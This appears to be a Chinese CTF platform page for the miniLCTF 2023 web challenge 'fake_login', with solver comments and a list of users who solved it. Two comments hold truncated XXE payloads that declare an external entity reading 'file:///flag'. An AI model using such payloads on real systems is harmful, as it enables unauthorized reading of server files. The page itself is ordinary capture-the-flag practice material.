fake_loginWEB 未解决

分数: 0 金币: 0
所属赛事: miniLCTF 2023
题目作者: 未知
一  血: dai
一血奖励: 0金币
解  决: 31
提  示:
描  述:
flag{}
评论
MRLD 1年前

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE user [ <!ELEMENT name ANY > <!ENTITY admin SYSTEM "file:///flag" >]> <user><userna

回复 0

MRLD 1年前

真得出生出题人,假flag是真的,闲的这样搞

回复 0

gooddemo 1年前

这个是xxe漏洞,所以在点击提交按钮时,修改Payload,内容如下:<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag">]> <user><use

回复 0

hopeinhand 1年前

找半天结果假flag是真的,很迷惑

回复 0

WriteUp

image
hopeinhand

1 金币

评分(0)

暂无评分

解题动态

minz 攻破了该题 4天前
xujunjjj 攻破了该题 19天前
wbiao 攻破了该题 2月前
nuxe 攻破了该题 2月前
ssoocc 攻破了该题 3月前
倦鸟叫了一整天 攻破了该题 5月前
amobaishi 攻破了该题 9月前
biandanjun 攻破了该题 11月前
tianna 攻破了该题 11月前
coldplay99999 攻破了该题 11月前
Rg 攻破了该题 1年前
WCRH 攻破了该题 1年前
POEighT 攻破了该题 1年前
wangjf 攻破了该题 1年前
t1tl3d 攻破了该题 1年前
fuhuameng 攻破了该题 1年前
cxy18 攻破了该题 1年前
Ramrem 攻破了该题 1年前
平凡的人 攻破了该题 1年前
小何lv 攻破了该题 1年前
问题反馈